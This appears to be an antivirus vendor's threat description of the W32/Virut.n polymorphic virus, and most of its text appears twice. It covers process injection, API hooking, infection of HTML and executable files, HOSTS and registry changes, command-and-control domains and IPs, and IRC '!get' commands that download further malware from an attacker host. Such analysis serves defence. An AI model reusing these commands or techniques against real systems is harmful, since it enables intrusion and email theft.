Content

W32/Virut.n

Type
Virus
SubType
Generic
Discovery Date
02/03/2009
Length
Varies
Minimum DAT
5517 (02/05/2009)
Updated DAT
5709 (08/14/2009)
Minimum Engine
5.2.00
Description Added
02/05/2009
Description Modified
02/25/2009 8:25 PM (PT)
Risk Assessment
Corporate User
Low-Profiled
Home User
Low-Profiled

Tab Navigation

Characteristics

-- Update February 15, 2009 --
The risk assessment of this threat has been updated to Low-Profiled due to media attention at:
http://www.microsoft.com/security/portal/Entry.aspx?Name=Virus%3aWin32%2fVirut.BM

--

W32/Virut.n will first inject threads into the Winlogon.exe process. When successful, it will cause the process to download and run the following file:

  • %WINDOWS%\TEMP\VRT7.tmp

This file will launch a new svchost.exe process and proceed to inject threads into the process. The svchost process create the following files in %WINDOWS\System32 folder and delete the previous VRT7.tmp file.

  • 8.tmp (data file)
  • 9.tmp

(svchost.exe is a legitimate Windows process in normal cases)

The 9.tmp file will be executed and can download further malware. %WINDOWS%\System32\drivers\etc\hosts file will be modified to have the following host string prepended:

  • 127.0.0.1 ZieF.pl
W32/Virut.n also injects code in running processes and hooks the following functions in ntdll.dll which transfers control to the virus every time any of these function calls are made.
  • NtCreateFile
  • NtCreateProcess
  • NtCreateProcessEx
  • NtOpenFile
  • NtQueryInformationProcess

The detection for this hooking is currently detected as Generic.dx!rootkit

Besides executables, W32/Virut.n also infects HTML Files. HTML files on the system are injected with an iFrame pointing to malicious domain such as ZieF.pl. Together with the modification in the HOSTS file, this will allow W32/Virut.n to infect clean machines accessing the infected HTML pages, while at the same time. preventing an infected machine from connecting and getting reinfected. This is possibly done to prevent the Virut server from being overloaded by infected machines.

The following registry entry is modified to allow firewall access for Winlogon.exe:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

The following registry entry is added:

  • HKEY_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UpdateHost

W32/Virut.n connects to the following domains or IP addresses:

  • horobl.cn
  • goasi.cn
  • setdoc.cn
  • irc.zief.pl
  • DNS2.zief.pl
  • proxim.ircgalaxy.pl
  • anti-captcha.com
  • lorentil.cn
  • thaexp.cn

 

  • 209.205.196.18
  • 66.232.126.195
  • 204.13.249.70
  • 58.65.232.34   
  • 61.235.117.80 
  • 61.235.117.81  
  • 74.55.100.7    
  • 124.207.41.201
  • 124.207.117.60
  • 124.236.241.91
  • 66.114.124.140
  • 64.13.232.135
  • 66.116.109.93
  • 210.51.37.106
  • 83.68.16.6
  • 211.95.79.6
  • 218.93.202.114
  • 209.205.196.18
  • 66.232.126.195
  • 69.46.16.191
  • 195.2.252.246
  • 94.247.2.38

 

It connects to the following IRC servers to receive commands:

  • irc.zief.pl
  • proxim.ircgalaxy.pl

It would also join an IRC channel to receive commands which includes downloading of other malware:

  • PRIVMSG [blocked] :!get http://horobl.cn/[blocked]/0032.exe
  • PRIVMSG [blocked] :!get http://horobl.cn/[blocked]/0034.exe

    Emails are havested from the infected machine and posted to the following server:

    • 69.46.16.191

    Malware that were downloaded may introduce other malicious behaviours in the system such as rootkits, backdoors and downloaders et cetera.

    (where %WINDOWS% refers to the Windows folder e.g. C:\Windows)

Symptoms

Method of Infection

Removal

AVERT recommends to always use latest DATs and engine. This threat will be cleaned if you have this combination.

Additional Windows ME/XP removal considerations

Variants

Variants

    N/A

All Information

Overview -

W32/Virut.n is a polymorpic parasitic virus. It will infect PE and HTML files in the system and download other malware.

Characteristics

Characteristics -

-- Update February 15, 2009 --
The risk assessment of this threat has been updated to Low-Profiled due to media attention at:
http://www.microsoft.com/security/portal/Entry.aspx?Name=Virus%3aWin32%2fVirut.BM

--

W32/Virut.n will first inject threads into the Winlogon.exe process. When successful, it will cause the process to download and run the following file:

  • %WINDOWS%\TEMP\VRT7.tmp

This file will launch a new svchost.exe process and proceed to inject threads into the process. The svchost process create the following files in %WINDOWS\System32 folder and delete the previous VRT7.tmp file.

  • 8.tmp (data file)
  • 9.tmp

(svchost.exe is a legitimate Windows process in normal cases)

The 9.tmp file will be executed and can download further malware. %WINDOWS%\System32\drivers\etc\hosts file will be modified to have the following host string prepended:

  • 127.0.0.1 ZieF.pl
W32/Virut.n also injects code in running processes and hooks the following functions in ntdll.dll which transfers control to the virus every time any of these function calls are made.
  • NtCreateFile
  • NtCreateProcess
  • NtCreateProcessEx
  • NtOpenFile
  • NtQueryInformationProcess

The detection for this hooking is currently detected as Generic.dx!rootkit

Besides executables, W32/Virut.n also infects HTML Files. HTML files on the system are injected with an iFrame pointing to malicious domain such as ZieF.pl. Together with the modification in the HOSTS file, this will allow W32/Virut.n to infect clean machines accessing the infected HTML pages, while at the same time. preventing an infected machine from connecting and getting reinfected. This is possibly done to prevent the Virut server from being overloaded by infected machines.

The following registry entry is modified to allow firewall access for Winlogon.exe:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

The following registry entry is added:

  • HKEY_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UpdateHost

W32/Virut.n connects to the following domains or IP addresses:

  • horobl.cn
  • goasi.cn
  • setdoc.cn
  • irc.zief.pl
  • DNS2.zief.pl
  • proxim.ircgalaxy.pl
  • anti-captcha.com
  • lorentil.cn
  • thaexp.cn

 

  • 209.205.196.18
  • 66.232.126.195
  • 204.13.249.70
  • 58.65.232.34   
  • 61.235.117.80 
  • 61.235.117.81  
  • 74.55.100.7    
  • 124.207.41.201
  • 124.207.117.60
  • 124.236.241.91
  • 66.114.124.140
  • 64.13.232.135
  • 66.116.109.93
  • 210.51.37.106
  • 83.68.16.6
  • 211.95.79.6
  • 218.93.202.114
  • 209.205.196.18
  • 66.232.126.195
  • 69.46.16.191
  • 195.2.252.246
  • 94.247.2.38

 

It connects to the following IRC servers to receive commands:

  • irc.zief.pl
  • proxim.ircgalaxy.pl

It would also join an IRC channel to receive commands which includes downloading of other malware:

  • PRIVMSG [blocked] :!get http://horobl.cn/[blocked]/0032.exe
  • PRIVMSG [blocked] :!get http://horobl.cn/[blocked]/0034.exe

    Emails are havested from the infected machine and posted to the following server:

    • 69.46.16.191

    Malware that were downloaded may introduce other malicious behaviours in the system such as rootkits, backdoors and downloaders et cetera.

    (where %WINDOWS% refers to the Windows folder e.g. C:\Windows)

Symptoms

Symptoms -

Method of Infection

Method of Infection -

Removal -

Removal -

AVERT recommends to always use latest DATs and engine. This threat will be cleaned if you have this combination.

Additional Windows ME/XP removal considerations

Variants

Variants -

    N/A